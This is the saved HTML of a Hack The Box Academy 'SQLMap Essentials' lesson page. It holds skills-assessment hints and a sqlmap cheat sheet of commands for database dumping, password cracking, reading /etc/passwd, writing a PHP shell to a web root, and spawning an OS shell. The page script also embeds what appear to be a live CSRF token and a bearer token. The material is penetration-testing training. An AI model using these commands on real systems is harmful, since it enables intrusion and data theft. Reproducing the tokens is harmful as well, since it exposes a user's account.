<h6 class="mt-4 mb-2">Skills Assessment</h6> <a href="https://academy.hackthebox.com/module/58/section/534" class="btn   btn-sm btn-block mt-1 py-2 text-left btn-lighter">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;
<span class="font-size-13">Skills Assessment</span>
</a>
</div>
</div>
<div class="card">
<div class="card-body bg-color-blue-nav">
<h5 class="card-title mb-4">My Workstation</h5>
<div class="row">
<div class="col-12">
<div id="sidePreview" style="height: 160px; border: 1px solid #323232; border-radius: 5px; background-color: #0a121c; text-align: center">
<div class="screenPlaceholder">
<p class="instanceStart" style="padding-top:70px; letter-spacing: 5px;">OFFLINE</p>
<p class="instanceLoading " style="padding-top:70px; display: none"><i class="fa fa-circle-notch fa-spin"></i> Starting...</p>
</div>
</div>
</div>
<div class="col-12 mt-2">
<div class="instanceStart">
<button class=" startInstanceBtn btn btn-light btn-sm mt-2 btn-block module-button py-2"><i class="fad fa-play-circle text-success"></i> &nbsp;Start Instance</button>
<p class="text-center mt-2 font-size-13 font-secondary">
<span class="text-success spawnsLeft">
<i class="fal fa-infinity"></i>
</span> / 1 spawns left
</p>
</div>
<button style="display:none;" class="fullScreenBtn btn btn-light btn-sm mt-2 module-button py-2"><i class="fad fa-expand text-success"></i> &nbsp;Interact</button>
<button style="display:none;" class="terminateInstanceBtn btn btn-light btn-sm mt-2 module-button py-2"><i class="fad fa-times text-danger"></i> &nbsp;Terminate</button>
<button style="display:none;" class="resetInstanceBtn btn btn-light btn-sm mt-2 module-button py-2"><i class="fad fa-sync text-warning"></i> &nbsp;Reset</button>
<div class="btn-group" role="group">
<button style="display:none; cursor: default;" class=" extendInstanceBtn btn btn-light btn-sm mt-2 module-button py-2">Life Left: <span class="lifeLeft"></span>m</button>
<button style="display:none;" data-toggle="tooltip" data-title="Extend Life" class=" extendInstanceBtn extendInstanceBtnClicker btn btn-light btn-sm mt-2 module-button py-2" data-original-title="" title=""><i class="fa fa-plus text-success"></i></button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="hint294" class="modal fade" tabindex="-1" role="dialog" aria-labelledby="hint294" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered">
<div class="modal-content">
<div class="modal-body">
<div class="text-center">
<h5><i class="fad fa-life-ring text-success"></i>&nbsp; Hint</h5>
<br>
<h6>You can use the option '-T flag5' to only dump data from the needed table. You can use the '--no-cast' flag to ensure you get the correct content. You may also, try running the command a few times to ensure you captured the content correctly.</h6>
</div>
</div>
</div>
</div>
</div>
<div id="hint295" class="modal fade" tabindex="-1" role="dialog" aria-labelledby="hint295" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered">
<div class="modal-content">
<div class="modal-body">
<div class="text-center">
<h5><i class="fad fa-life-ring text-success"></i>&nbsp; Hint</h5>
<br>
<h6>Use the prefix '`)'.</h6>
</div>
</div>
</div>
</div>
</div>
<div id="hint296" class="modal fade" tabindex="-1" role="dialog" aria-labelledby="hint296" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered">
<div class="modal-content">
<div class="modal-body">
<div class="text-center">
<h5><i class="fad fa-life-ring text-success"></i>&nbsp; Hint</h5>
<br>
<h6>Try to count the number of columns in the page output, and specify them for sqlmap.</h6>
</div>
</div>
</div>
</div>
</div>
<div id="cheatSheetModal" class="modal fade" tabindex="-1" role="dialog" aria-labelledby="unlockModuleModal" aria-hidden="true">
<div class="modal-dialog modal-lg">
<div class="modal-content">
<div class="modal-body">
<div class="text-center text-break">
<h5><i class="fad fa-file-alt"></i>&nbsp; Cheat Sheet</h5>
<p>The cheat sheet is as a useful command reference for this module.</p>
<div class="table-responsive"><table class="table table-striped text-left">
<thead>
<tr>
<th><strong>Command</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td><code>sqlmap -h</code></td>
<td>View the basic help menu</td>
</tr>
<tr>
<td><code>sqlmap -hh</code></td>
<td>View the advanced help menu</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/vuln.php?id=1" --batch</code></td>
<td>Run <code>SQLMap</code> without asking for user input</td>
</tr>
<tr>
<td><code>sqlmap 'http://www.example.com/' --data 'uid=1&amp;name=test'</code></td>
<td><code>SQLMap</code> with POST request</td>
</tr>
<tr>
<td><code>sqlmap 'http://www.example.com/' --data 'uid=1*&amp;name=test'</code></td>
<td>POST request specifying an injection point with an asterisk</td>
</tr>
<tr>
<td><code>sqlmap -r req.txt</code></td>
<td>Passing an HTTP request file to <code>SQLMap</code></td>
</tr>
<tr>
<td><code>sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'</code></td>
<td>Specifying a cookie header</td>
</tr>
<tr>
<td><code>sqlmap -u www.target.com --data='id=1' --method PUT</code></td>
<td>Specifying a PUT request</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt</code></td>
<td>Store traffic to an output file</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch</code></td>
<td>Specify verbosity level</td>
</tr>
<tr>
<td><code>sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"</code></td>
<td>Specifying a prefix or suffix</td>
</tr>
<tr>
<td><code>sqlmap -u www.example.com/?id=1 -v 3 --level=5</code></td>
<td>Specifying the level and risk</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba</code></td>
<td>Basic DB enumeration</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --tables -D testdb</code></td>
<td>Table enumeration</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname</code></td>
<td>Table/row enumeration</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"</code></td>
<td>Conditional enumeration</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --schema</code></td>
<td>Database schema enumeration</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --search -T user</code></td>
<td>Searching for data</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --passwords --batch</code></td>
<td>Password enumeration and cracking</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/" --data="id=1&amp;csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"</code></td>
<td>Anti-CSRF token bypass</td>
</tr>
<tr>
<td><code>sqlmap --list-tampers</code></td>
<td>List all tamper scripts</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba</code></td>
<td>Check for DBA privileges</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"</code></td>
<td>Reading a local file</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"</code></td>
<td>Writing a file</td>
</tr>
<tr>
<td><code>sqlmap -u "http://www.example.com/?id=1" --os-shell</code></td>
<td>Spawning an OS shell</td>
</tr>
</tbody>
</table></div>
</div>
</div>
<div class="modal-footer">
<a class="btn btn-light btn-block" href="https://academy.hackthebox.com/module/cheatsheet/58">Download Cheatsheet</a>
</div>
</div>
</div>
</div>
</div>
<footer class="footer">
<div class="container-fluid">
<div class="row">
<div class="col-sm-6">
</div>
<div class="col-sm-6">
<div class="text-sm-right d-none d-sm-block">
Powered by &nbsp; <a href="https://www.hackthebox.com/" target="_blank"><img style="margin-bottom: 1px;" src="./SQLMap Essentials6_files/logo-htb.svg" height="20px"></a>
</div>
</div>
</div>
</div>
</footer>
</div>
</div>
</div>
<script src="./SQLMap Essentials6_files/jquery.min.js.download"></script>
<script src="./SQLMap Essentials6_files/bootstrap.bundle.min.js.download"></script>
<script src="./SQLMap Essentials6_files/metisMenu.min.js.download"></script>
<script src="./SQLMap Essentials6_files/simplebar.min.js.download"></script>
<script src="./SQLMap Essentials6_files/waves.min.js.download"></script>
<script src="./SQLMap Essentials6_files/toastr.min.js.download"></script>
<script src="./SQLMap Essentials6_files/axios.min.js.download"></script>
<script src="./SQLMap Essentials6_files/prism.js.download"></script>
<script src="./SQLMap Essentials6_files/main.js.download"></script>
<script>
    axios.defaults.headers.common = {
        'X-CSRF-TOKEN': 'OEgK0JdzOZwGIHHODUXYrzCqZr0uFSlpTj7r9g5E',
        'X-Requested-With': 'XMLHttpRequest',
        'Authorization': 'Bearer ' + 'jgfghW9jOUxTYrPOMG9i2ujbtUFdtKuilcFrKtLWJpv9gAzKxNnjcsm7Dg2wIx8ivYvDBp7jCWD5XRNP'
    };
</script>
<script>
    $('table').addClass('table table-striped text-left').wrap('<div class="table-responsive"></div>');

    $('.training-module a').attr('target','_blank').attr('rel','noopener nofollow');

    $( ".favouriteBtn" ).click(function() {
        let id = $(this).data('module-id');

        axios.get('/api/modules/favourite/'+id).then(response => {
            let data = response.data;
            if (data.fav === 1) {
                $(this).removeClass('far fa').addClass('fa');
                toastr["success"](data.message, "Success");
            } else {
                $(this).removeClass('far fa').addClass('far');
                toastr["success"](data.message, "Success");
            }
        });
    });

    function encode_utf8(string) {
    return unescape(encodeURIComponent(string));
  }

  $('.btnAnswer').click(function() {
    let question_id = $(this).data('question-id');
    $(this).attr('disabled', 1);
    let utf8EncodedString = encode_utf8($('#answer' + question_id).val());
    axios.post('/api/check/answer', {
      answer: btoa(utf8EncodedString),
      question_id: question_id
    }).then(response => {
      $(this).removeAttr('disabled');
      let data = response.data;
      if (data.success === 0) {
        toastr['error'](data.message, 'Error');
      } else {
        $(this).attr('disabled', 1);
        $('#answer' + question_id).attr('disabled', 1);
        $('#answer' + question_id).addClass('text-success');
        $('#hintBtn' + question_id).attr('disabled', 1);
        toastr['success'](data.message, 'Success');
        completeCheck();
      }
    });
  });

  $('.btnAnswerExercise').click(function() {
    let exercise_id = $(this).data('exercise-id');
    $(this).attr('disabled', 1);
    let utf8EncodedString = encode_utf8($(`#exerciseAnswer${exercise_id}`).val());
    axios.post(`/api/check/exercise/${exercise_id}/answer`, {
      answer: btoa(utf8EncodedString)
    }).then(response => {
      $(this).removeAttr('disabled');
      let data = response.data;
      if (data.success === 0) {
        toastr['error'](data.message, 'Error');
      } else {
        $(this).attr('disabled', 1);
        $(`#exerciseAnswer${exercise_id}`).attr('disabled', 1);
        $(`#exerciseAnswer${exercise_id}`).addClass('text-success');
        toastr['success'](data.message, 'Success');
      }
    });
  });

    
    $('.reveal-modal').click(e => {
        let id = $(e.target).data('exercise-id');
        $(`#revealExerciseAnswer${id}`).modal('hide');
    });

    $( document ).ready(function() {

        $('pre').filter(function () {
            return this.className.match(/\blanguage-/);
        }).each(function () {
            let heading = $(this).prevAll().closest('h4').last().text();

            if (this.className === ' language-shell-session') {
                wrapTerminal(this, heading);
            } else if (this.className === ' language-powershell-session') {
                wrapPSTerminal(this, heading);
            } else if (this.className === ' language-cmd-session') {
                wrapCMDTerminal(this, heading);
            } else if (this.className.startsWith(' language-')) {
                var language = this.className.split('-').pop();
                wrapCodeBlock(this,language);
            }
        });

        wrapBrowser($('.website-screenshot'));
        completeCheck();

        $("span:contains('[!bash!]')").html('<span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span>');
    });

    function completeCheck()
    {
        axios.get('/api/check/complete/526').then(response => {
            let data = response.data;
            if (data.success === 1) {
                if (data.completed === true) {
                    $('#completeBtn').show();
                }
            }
        });
    }

    function wrapTerminal(element, heading)
    {
        $(element).css('line-height', '0px');
        $(element).wrap('<div class="window_content"></div>')
            .parent().wrap('<div class="window_container"></div>')
            .prepend(`
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title">${heading}</span>
                </div>
            `);
    }
    function wrapPSTerminal(element, heading)
    {
        $(element).css('background', '#012456').children().css('color','white');
        $(element).css('line-height', '0px');
        $(element).wrap('<div class="window_content"></div>')
            .parent().wrap('<div class="window_container"></div>')
            .prepend(`
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title">${heading}</span>
                </div>
            `);
    }
    function wrapCMDTerminal(element, heading)
    {
        $(element).css('background', 'black').children().css('color','white');
        $(element).css('line-height', '0px');
        $(element).wrap('<div class="window_content"></div>')
            .parent().wrap('<div class="window_container"></div>')
            .prepend(`
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title">${heading}</span>
                </div>
            `);
    }
    function wrapCodeBlock(element,lang)
    {
        $(element).wrap('<div class="window_content"></div>')
            .parent().wrap('<div class="window_container"></div>')
            .prepend('<div class="window_top">Code: <span class="text-success">'+lang+'</div>');
    }
    function wrapBrowserOld(element)
    {
        $(element).css("border", "0px").css("border-radius","0");
        let url = element.data('url');
        $(element).wrap('<div class="window_content"></div>')
            .parent().wrap('<div class="window_container"></div>')
            .prepend(`
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <input type="text" class="website-screenshot-url" disabled value="${url}">
                    <span class="float-right"><i class="fa fa-home"></i></span>
                </div>
            `);
    }
    function wrapBrowser(element)
    {
        $(element).css("border", "0px").css("border-radius","0");

        $(element).each( function(index,e) {
            let url = $(e).data('url');
            $(e).wrap('<div class="window_content"></div>')
                .parent().wrap('<div class="window_container"></div>')
                .prepend(`
                    <div class="window_top">
                        <span class="mr-2">
                            <i class="fa fa-arrow-circle-left"></i> <i class="fa fa-arrow-right"></i> <i class="fa fa-redo"></i> <i class="fa fa-home"></i>
                        </span>
                        <input type="text" class="website-screenshot-url" disabled value="${url}">
                        <span class="float-right"><i class="fa fa-bars"></i></span>
                    </div>
                `);
        })
    }
</script>
<script type="module">
    import RFB from '/assets/libs/vnc/core/rfb.js';

    let rfb;
    let sidePreview;
    let desktopName;
    let pwnboxActive = false;

    function connectedToServer(e) {
        status("Connected to " + desktopName);
        $('.fullScreenBtn').show();
        $('.resetInstanceBtn').show();
        $('.terminateInstanceBtn').show();
        $('.extendInstanceBtn').show();
        $('.instanceLoading').hide();
        $('.instanceStart').hide();
        $('.resetInstanceBtn').prop('disabled',false);
        $('.fullScreenBtn').prop('disabled',false);
        $('.extendInstanceBtn').prop('disabled',false);
        $('.terminateInstanceBtn').prop('disabled',false);

        document.querySelector('canvas').addEventListener('focus', (event) => {
            navigator.clipboard.readText()
                .then(text => {
                    writeToClipboard(text);
                })
                .catch(err => {
                    console.log('Something went wrong while accessing clipboard', err);
                })
        });

    }

    function disconnectedFromServer(e) {
        status("Disconnected");
        $('.screenPlaceholder').show();
        stopCountdown();
    }

    function clipboardReceived(e) {
        navigator.clipboard.writeText(e.detail.text)
            .then(() => {
                // Success!
            })
            .catch(err => {
                console.log('Something went wrong while copying to clipboard.', err);
            });
    }

    function updateDesktopName(e) {
        desktopName = e.detail.name;
    }

    function status(text) {
        console.log(text);
        $("#statusText").html(text);
    }

    function readQueryVariable(name) {
        const re = new RegExp('.*[?&]' + name + '=([^&#]*)'),
            match = document.location.href.match(re);

        if (match) {
            return decodeURIComponent(match[1]);
        }

        return null;
    }

    function writeToClipboard(text) {
        rfb.clipboardPasteFrom(text);
    }

    let host = '';
    let password = '';
    let countdown = '';
    let targetCountdown = '';
    let url= '';
    let spawnInterval = null;

    function getPwnbox() {
        axios.get('/api/get/pwnbox').then(response => {
            let data = response.data;

            if (spawnInterval !== null && data.instance.action_log !== null) {
                let error = data.instance.action_log.find(log => log.error === true);
                if (error) {
                    $('.resetInstanceBtn').prop('disabled',false);
                    $('.fullScreenBtn').prop('disabled',false);
                    $('.extendInstanceBtn').prop('disabled',false);
                    $('.terminateInstanceBtn').prop('disabled',false);
                    $('.instanceStart').show();
                    $('.instanceLoading').hide();
                    $('.startInstanceBtn').show();

                    clearInterval(spawnInterval);
                    disconnectedFromServer();

                    let errorMessage = `${error.text}. Please contact support.`;
                    toastr["error"](errorMessage, "Error");

                    status(errorMessage);
                    return;
                }
            }

            if (data.success === 1 && data.instance.vnc_password !== null) {
                if (data.instance.action_log.find(log => log.action === 'ready')) {
                    host = 'proxy-uk.htb-cloud.com/bird/' + data.instance.hostname;
                    password = data.instance.vnc_password;
                    $('.lifeLeft').html(data.instance.life_remaining);
                    startCountdown();
                    $('.screenPlaceholder').hide();
                    url = 'https://vnc.htb-cloud.com/index.html?host=' + host + '&password=' + password;
                    pwnboxActive = true;
                    connect();

                    if (spawnInterval !== null) {
                        clearInterval(spawnInterval);
                    }
                }
            } else {
                $('.screenPlaceholder').show();
            }

        });
    }

        function extendPwnbox() {
        axios.get('/api/extend/pwnbox').then(response => {
            let data = response.data;
            if (data.success === 1) {
                $('.lifeLeft').html(data.instance.life_remaining);
                stopCountdown();
                startCountdown();
                toastr["success"]("Time extended for 60 minutes.", "Success");
            } else {
                toastr["error"](data.message, "Error");
            }

        });
    }
    
    getPwnbox();

    function startCountdown() {
        countdown = setInterval(function() {
            let life = parseInt($('.lifeLeft').html()) -1;
            $('.lifeLeft').html(life)
        }, 60 * 1000);
    }

    function stopCountdown() {
        clearInterval(countdown);
    }

    function terminatePwnbox() {
        $('.resetInstanceBtn').prop('disabled',true);
        $('.terminateInstanceBtn').prop('disabled',true);
        $('.fullScreenBtn').prop('disabled',true);
        $('.extendInstanceBtn').prop('disabled',true);
        $('.instanceStart').hide();

        $('.instanceTerminating').show();

        status('Terminating Interactive Instance...');

        axios.delete('/api/terminate/pwnbox')
            .then(({ data }) => {
                if (data.success === 1) {
                    $('.startInstanceBtn').show();
                    $('.instanceStart').show();
                    $('.instanceTerminating').hide();
                    $('.resetInstanceBtn').hide();
                    $('.terminateInstanceBtn').hide();
                    $('.fullScreenBtn').hide();
                    $('.extendInstanceBtn').hide();

                    pwnboxActive = false;

                    toastr['success']('Instance has been terminated.', 'Success');
                } else {
                    toastr['error'](data.message, 'Error');
                    connect();
                    $('.resetInstanceBtn').prop("disabled", false);
                    $('.fullScreenBtn').prop('disabled',false);
                    $('.extendInstanceBtn').prop('disabled',false);
                    $('.terminateInstanceBtn').prop('disabled',false);
                }
            });
    }

    function startPwnbox() {
        $('.resetInstanceBtn').prop('disabled',true);
        $('.fullScreenBtn').prop('disabled',true);
        $('.extendInstanceBtn').prop('disabled',true);
        $('.terminateInstanceBtn').prop('disabled',true);
        $('.instanceStart').hide();
        $('.instanceLoading').show();
        $('.startInstanceBtn').hide();

        status("Starting Interactive Instance...");

        grecaptcha.ready(function() {
            grecaptcha.execute('6LeI6LsaAAAAAKgdStgBC6B4UVbXlpYNaYGN46Ah', {action: 'spawnPwnbox'}).then(function(token) {
                if (token) {
                    axios.get('/api/spawn/pwnbox?g-recaptcha-response= '+token).then(response => {
                        let data = response.data;
                        if (data.success === 1) {
                            spawnInterval = setInterval(() => {
                                getPwnbox();
                            }, 2000);
                        } else {
                            if(data.code === 1 || (data.code === 3 && pwnboxActive)) {
                                $('.resetInstanceBtn').prop("disabled", false);
                                $('.fullScreenBtn').prop('disabled',false);
                                $('.extendInstanceBtn').prop('disabled',false);
                                $('.terminateInstanceBtn').prop('disabled',false);
                                connect();

                                if (data.code === 3) {
                                    $('.instanceLoading').hide();
                                    startCountdown();
                                }
                            } else {
                                $('.startInstanceBtn').show();
                                $('.instanceStart').show();
                                $('.instanceLoading').hide();
                            }

                            toastr["error"](data.message, "Error");
                        }

                    });
                } else {
                    $('.resetInstanceBtn').prop('disabled',false);
                    $('.fullScreenBtn').prop('disabled',false);
                    $('.extendInstanceBtn').prop('disabled',false);
                    $('.terminateInstanceBtn').prop('disabled',false);
                    $('.instanceStart').show();
                    $('.instanceLoading').hide();
                    $('.startInstanceBtn').show();
                }
            });
        });
    }

    $('.fullScreenBtn').click(function() {
        window.open(url, "_blank");
    });

    $('.startInstanceBtn').click(function() {
        startPwnbox();
                spawnTarget();
            });

    $('.resetInstanceBtn').click(function() {
        $('.screenPlaceholder').show();
        $('.instanceStart').show();
                rfb.disconnect();
                sidePreview.disconnect();
        startPwnbox();
    });

    $('.terminateInstanceBtn').click(function() {
        $('.screenPlaceholder').show();
        $('.instanceStart').show();
                rfb.disconnect();
                sidePreview.disconnect();
        terminatePwnbox();
    });

    $('.extendInstanceBtnClicker').click(function() {
       extendPwnbox();
    });

    $('.resetTargetBtn').click(function(){
        $(this).prop('disabled',true);
                    spawnDocker();
                    });

    function connect() {
        status("Connecting to " + host.split('/')[2] + "...");

                rfb = new RFB(document.getElementById('screen'), 'wss://' + host,
            { credentials: { password: password } });
        //Listeners
        rfb.addEventListener("desktopname", updateDesktopName);
        rfb.addEventListener("clipboard",clipboardReceived);

        rfb.resizeSession = true;
        rfb.viewOnly = false;
        
        sidePreview = new RFB(document.getElementById('sidePreview'), 'wss://' + host,
            { credentials: { password: password } });

        sidePreview.addEventListener("connect",  connectedToServer);
        sidePreview.addEventListener("disconnect", disconnectedFromServer);

        sidePreview.resizeSession = false;
        sidePreview.viewOnly = true;
        sidePreview.scaleViewport = true;
    }

    $('.target, .targetIp').click(e => {
        if ($('.resetTargetBtn').is(':hidden')) return;
        navigator.clipboard.writeText($(e.target).html())
            .then(() => {
                toastr['success']('Target copied to clipboard', 'Success');
            })
            .catch(err => {
                console.log('Something went wrong while copying to clipboard.', err);
            });
    });

        $('.spawnTargetBtn').click(function() {
        spawnDocker();
    })

    function spawnDocker() {
        $('.target').html('<i class="fad fa-circle-notch fa-spin"></i> Target is spawning...');
        axios.get('/api/spawn/container/526').then(response => {
            let data = response.data;
            if (data.success === 1) {
                $('.target').html(data.instance.hostname+":"+data.instance.port);
                $('.targetIp').html(data.instance.hostname);
                $('.resetTargetBtn').show();
                $('.resetTargetBtn').prop('disabled',false);
                $('.targetLifeTimeContainer').show();
                $('.targetLifeTime').html(90);
                startTargetCountdown();
            } else {
                toastr["error"]("Target failed to spawn. Please try refreshing the page.", "Error");
                $('.target').html('<i class="fad fa-circle-notch fa-spin"></i> Target failed to spawn :(');
                $('.resetTargetBtn').prop('disabled',false);
            }
        });
    }
        
    function startTargetCountdown() {
        targetCountdown = setInterval(function() {
            let life = parseInt($('.targetLifeTime').html()) -1;
            $('.targetLifeTime').html(life)
            if (life == 0) {
                $('.targetLifeTimeContainer').hide();
            }
        }, 60 * 1000);
    }
</script>


<div><div class="grecaptcha-badge" data-style="bottomright" style="width: 256px; height: 60px; display: block; transition: right 0.3s ease 0s; position: fixed; bottom: 14px; right: -186px; box-shadow: gray 0px 0px 5px; border-radius: 2px; overflow: hidden;"><div class="grecaptcha-logo"><iframe title="reCAPTCHA" src="./SQLMap Essentials6_files/anchor.html" width="256" height="60" role="presentation" name="a-ogntgxp47f72" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox"></iframe></div><div class="grecaptcha-error"></div><textarea id="g-recaptcha-response-100000" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea></div><iframe style="display: none;" src="./SQLMap Essentials6_files/saved_resource.html"></iframe></div><div id="torrent-scanner-popup" style="display: none;"></div><img src="./SQLMap Essentials6_files/adsct" height="1" width="1" style="display: none;"><img src="./SQLMap Essentials6_files/adsct(1)" height="1" width="1" style="display: none;"><iframe id="intercom-frame" style="position: absolute !important; opacity: 0 !important; width: 1px !important; height: 1px !important; top: 0 !important; left: 0 !important; border: none !important; display: block !important; z-index: -1 !important; pointer-events: none;" aria-hidden="true" tabindex="-1" title="Intercom" src="./SQLMap Essentials6_files/saved_resource(1).html"></iframe><div class="intercom-lightweight-app"><div class="intercom-lightweight-app-launcher intercom-launcher" role="button" tabindex="0" aria-label="Open Intercom Messenger" aria-live="polite"><div class="intercom-lightweight-app-launcher-icon intercom-lightweight-app-launcher-icon-open"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 28 32"><path d="M28 32s-4.714-1.855-8.527-3.34H3.437C1.54 28.66 0 27.026 0 25.013V3.644C0 1.633 1.54 0 3.437 0h21.125c1.898 0 3.437 1.632 3.437 3.645v18.404H28V32zm-4.139-11.982a.88.88 0 00-1.292-.105c-.03.026-3.015 2.681-8.57 2.681-5.486 0-8.517-2.636-8.571-2.684a.88.88 0 00-1.29.107 1.01 1.01 0 00-.219.708.992.992 0 00.318.664c.142.128 3.537 3.15 9.762 3.15 6.226 0 9.621-3.022 9.763-3.15a.992.992 0 00.317-.664 1.01 1.01 0 00-.218-.707z"></path></svg></div><div class="intercom-lightweight-app-launcher-icon intercom-lightweight-app-launcher-icon-minimize"><svg viewBox="0 0 16 14" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M.116 4.884l1.768-1.768L8 9.232l6.116-6.116 1.768 1.768L8 12.768.116 4.884z"></path></svg></div></div><style id="intercom-lightweight-app-style" type="text/css">
  @keyframes intercom-lightweight-app-launcher {
    from {
      opacity: 0;
      transform: scale(0.5);
    }
    to {
      opacity: 1;
      transform: scale(1);
    }
  }

  @keyframes intercom-lightweight-app-gradient {
    from {
      opacity: 0;
    }
    to {
      opacity: 1;
    }
  }

  @keyframes intercom-lightweight-app-messenger {
    from {
      opacity: 0;
      transform: translateY(20px);
    }
    to {
      opacity: 1;
      transform: translateY(0);
    }
  }

  .intercom-lightweight-app {
    position: fixed;
    z-index: 2147483001;
    width: 0;
    height: 0;
    font-family: intercom-font, "Helvetica Neue", "Apple Color Emoji", Helvetica, Arial, sans-serif;
  }

  .intercom-lightweight-app-gradient {
    position: fixed;
    z-index: 2147483002;
    width: 500px;
    height: 500px;
    bottom: 0;
    right: 0;
    pointer-events: none;
    background: radial-gradient(
      ellipse at bottom right,
      rgba(29, 39, 54, 0.16) 0%,
      rgba(29, 39, 54, 0) 72%);
    animation: intercom-lightweight-app-gradient 200ms ease-out;
  }

  .intercom-lightweight-app-launcher {
    position: fixed;
    z-index: 2147483003;
    bottom: 20px;
    right: 20px;
    width: 60px;
    height: 60px;
    border-radius: 50%;
    background: #85C700;
    cursor: pointer;
    box-shadow: 0 1px 6px 0 rgba(0, 0, 0, 0.06), 0 2px 32px 0 rgba(0, 0, 0, 0.16);
    animation: intercom-lightweight-app-launcher 250ms ease;
  }

  .intercom-lightweight-app-launcher:focus {
    outline: none;
    
  }

  .intercom-lightweight-app-launcher-icon {
    display: flex;
    align-items: center;
    justify-content: center;
    position: absolute;
    top: 0;
    left: 0;
    width: 60px;
    height: 60px;
    transition: transform 100ms linear, opacity 80ms linear;
  }

  .intercom-lightweight-app-launcher-icon-open {
    
        opacity: 1;
        transform: rotate(0deg) scale(1);
      
  }

  .intercom-lightweight-app-launcher-icon-open svg {
    width: 28px;
    height: 32px;
  }

  .intercom-lightweight-app-launcher-icon-open svg path {
    fill: rgb(255, 255, 255);
  }

  .intercom-lightweight-app-launcher-icon-self-serve {
    
        opacity: 1;
        transform: rotate(0deg) scale(1);
      
  }

  .intercom-lightweight-app-launcher-icon-self-serve svg {
    height: 56px;
  }

  .intercom-lightweight-app-launcher-icon-self-serve svg path {
    fill: rgb(255, 255, 255);
  }

  .intercom-lightweight-app-launcher-custom-icon-open {
    max-height: 36px;
    max-width: 36px;
    
        opacity: 1;
        transform: rotate(0deg) scale(1);
      
  }

  .intercom-lightweight-app-launcher-icon-minimize {
    
        opacity: 0;
        transform: rotate(-60deg) scale(0);
      
  }

  .intercom-lightweight-app-launcher-icon-minimize svg {
    width: 16px;
  }

  .intercom-lightweight-app-launcher-icon-minimize svg path {
    fill: rgb(255, 255, 255);
  }

  .intercom-lightweight-app-messenger {
    position: fixed;
    z-index: 2147483003;
    overflow: hidden;
    background-color: white;
    animation: intercom-lightweight-app-messenger 250ms ease-out;
    
        width: 376px;
        height: calc(100% - 120px);
        max-height: 704px;
        min-height: 250px;
        right: 20px;
        bottom: 100px;
        box-shadow: 0 5px 40px rgba(0,0,0,0.16);
        border-radius: 8px;
      
  }

  .intercom-lightweight-app-messenger-header {
    height: 75px;
    background: linear-gradient(
      135deg,
      rgb(17, 25, 39) 0%,
      rgb(0, 0, 0) 100%
    );
  }

  @media print {
    .intercom-lightweight-app {
      display: none;
    }
  }
</style></div></body></html>